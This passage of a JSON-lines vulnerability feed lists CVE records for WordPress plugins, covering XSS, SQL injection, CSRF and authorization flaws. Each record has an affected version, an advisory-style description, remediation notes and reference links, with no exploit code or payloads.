parameter.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942291\\\/wedevs-project-manager#file1792\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942291\\\/wedevs-project-manager#file1792\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.3\\\/src\\\/User\\\/Controllers\\\/User_Controller.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.3\\\/src\\\/User\\\/Controllers\\\/User_Controller.php#L158\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5e4708-db3e-483c-852f-1a487825cf92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5e4708-db3e-483c-852f-1a487825cf92?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3680","slug":"enteraddons","versionImpact":"2.1.5","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Animation Title widget's img tag in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29cc82cb-f3fd-4de5-9731-7ceb1212b0f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29cc82cb-f3fd-4de5-9731-7ceb1212b0f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6167","slug":"just-custom-fields","versionImpact":"3.3.2","description":"The Just Custom Fields plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several AJAX functions in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke this functionality intended for admin users. This enables subscribers to manage field groups, change visibility of items among other things.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14d71220-be60-498d-92ca-055f1c237060?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14d71220-be60-498d-92ca-055f1c237060?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6627","slug":"happy-elementor-addons","versionImpact":"3.11.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's PDF View widget in all versions up to, and including, 3.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bfe0a05-6bf9-4acc-bf9d-05079c3b3664?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bfe0a05-6bf9-4acc-bf9d-05079c3b3664?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/pdf-view\\\/widget.php#L587\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/pdf-view\\\/widget.php#L587\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124446\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124446\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43270","slug":"wp-backitup","versionImpact":"1.50","description":"Missing Authorization vulnerability in WPBackItUp Backup and Restore WordPress allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-unauthenticated-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-unauthenticated-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11432","slug":"suevafree-essential-kit","versionImpact":"1.1.3","description":"The SuevaFree Essential Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'counter' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suevafree-essential-kit\\\/trunk\\\/core\\\/shortcodes\\\/counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suevafree-essential-kit\\\/trunk\\\/core\\\/shortcodes\\\/counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suevafree-essential-kit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suevafree-essential-kit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c55e673-93af-403e-a690-2ae02c63541f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c55e673-93af-403e-a690-2ae02c63541f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12293","slug":"user-role-editor","versionImpact":"4.64.3","description":"The User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.64.3. This is due to missing or incorrect nonce validation on the update_roles() function. This makes it possible for unauthenticated attackers to add or remove roles for arbitrary users, including escalating their privileges to administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208193\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-role-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-role-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f359d02-d4ce-4045-9e79-ae0f92b84766?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f359d02-d4ce-4045-9e79-ae0f92b84766?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12383","slug":"woo-binary-mlm","versionImpact":"2.0","description":"The Binary MLM Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'bmw_display_pv_set_page' function and insufficient input sanitization and output escaping of the 'product_points' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b061fbf2-4bb3-4ccc-ba90-1e947365435e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b061fbf2-4bb3-4ccc-ba90-1e947365435e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13599","slug":"learnpress","versionImpact":"4.2.7.5","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.2.7.5 due to insufficient input sanitization and output escaping of a lesson name. This makes it possible for authenticated attackers, with LP Instructor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226650\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226650\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67709117-8912-4c09-afcb-0c07345d00e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67709117-8912-4c09-afcb-0c07345d00e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13010","slug":"wp-foodbakery","versionImpact":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.7 due to insufficient input sanitization and output escaping on the 'search_type' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f267527d-5fb5-4fc2-bb35-bc60854f1a68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f267527d-5fb5-4fc2-bb35-bc60854f1a68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2107","slug":"arielbrailovsky-viralad","versionImpact":"1.0.8","description":"The ArielBrailovsky-ViralAd plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the printResultAndDie() function in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only appears to be exploitable on very old versions of WordPress.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6c846c8-df8a-4a95-834e-a9443b6a86b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6c846c8-df8a-4a95-834e-a9443b6a86b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2880","slug":"yame-linkinbio","versionImpact":"0.9.0","description":"The Yame | Link In Bio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 0.9.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yame-linkinbio\\\/trunk\\\/vendor\\\/phpfastcache\\\/phpfastcache\\\/examples\\\/phpinfo.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yame-linkinbio\\\/trunk\\\/vendor\\\/phpfastcache\\\/phpfastcache\\\/examples\\\/phpinfo.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yame-linkinbio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yame-linkinbio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45aea72-2c9d-484d-8904-a1985df4b57c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45aea72-2c9d-484d-8904-a1985df4b57c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11266","slug":"geocache-stat-bar-widget","versionImpact":"0.911","description":"The Geocache Stat Bar Widget WordPress plugin through 0.911 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/361a4635-7e7d-483c-b2ce-a857d60d91ea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/361a4635-7e7d-483c-b2ce-a857d60d91ea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24759","slug":"wp-businessdirectory","versionImpact":"3.1.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Blind SQL Injection. This issue affects WP-BusinessDirectory: from n\/a through 3.1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-3-1-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-3-1-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6080","slug":"gym-management","versionImpact":"67.7.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to unauthorized admin account creation in all versions up to, and including, 67.7.0. This is due to the plugin not properly validating a user's capabilities prior to adding users. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new users, including admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f853657-1801-4d63-89b8-b2132212a205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f853657-1801-4d63-89b8-b2132212a205?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0388","slug":"randomtext","versionImpact":"0.3.0","description":"The Random Text WordPress plugin through 0.3.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77861a2e-879a-4bd0-b4c0-cd19481ace5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77861a2e-879a-4bd0-b4c0-cd19481ace5d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3404","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.0","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized decryption of private information in versions up to, and including, 5.5.0. This is due to the passphrase and iv being hardcoded in the 'pm_encrypt_decrypt_pass' function and used across all sites running the plugin. This makes it possible for authenticated attackers, with administrator-level permissions or above to decrypt and view users' passwords. If combined with another vulnerability, this can potentially grant lower-privileged users access to users' passwords.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d490bfb-6560-428e-ad91-0f8d8bc9b1f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d490bfb-6560-428e-ad91-0f8d8bc9b1f2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/includes\\\/class-profile-magic-request.php#L325\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/includes\\\/class-profile-magic-request.php#L325\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2936383\\\/profilegrid-user-profiles-groups-and-communities#file475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2936383\\\/profilegrid-user-profiles-groups-and-communities#file475\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7247","slug":"login-as-customer-or-user","versionImpact":"3.8","description":"The Login as User or Customer WordPress plugin through 3.8 does not prevent users from logging in as any other user on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96b93253-31d0-4184-94b7-f1e18355d841\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96b93253-31d0-4184-94b7-f1e18355d841\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1GCOzJ-ZovYij9GIdmsrZrR9g8mlC22hs\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1GCOzJ-ZovYij9GIdmsrZrR9g8mlC22hs\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3595","slug":"pure-chat","versionImpact":"2.22","description":"The Pure Chat \u2013 Live Chat Plugin & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the purechatwid and purechatwname parameter in all versions up to, and including, 2.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d03c798-dc77-407c-8674-d0bd2f1ada8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d03c798-dc77-407c-8674-d0bd2f1ada8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4668","slug":"gum-elementor-addon","versionImpact":"1.3.4","description":"The Gum Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Price Table and Post Slider widgets in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4effc8-7b24-4a6c-a161-176a22de6d6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4effc8-7b24-4a6c-a161-176a22de6d6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/pricetable.php#L2013\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/pricetable.php#L2013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/post_slider.php#L2353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/post_slider.php#L2353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gum-elementor-addon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gum-elementor-addon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093511\\\/#file48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093511\\\/#file48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6069","slug":"pie-register","versionImpact":"3.8.3.4","description":"The Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation\/deactivation due to missing capability checks on the pieregister_install_addon, pieregister_activate_addon and pieregister_deactivate_addon functions in all versions up to, and including, 3.8.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install, activate and deactivate arbitrary plugins. As a result, attackers might achieve code execution on the targeted server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b946ee73-4cf9-48c8-b456-285b118c6b05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b946ee73-4cf9-48c8-b456-285b118c6b05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L794\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L727\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L727\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L761\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L761\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6521","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7c6cfa-6cac-46d2-8eb9-9fef8049f6e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7c6cfa-6cac-46d2-8eb9-9fef8049f6e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
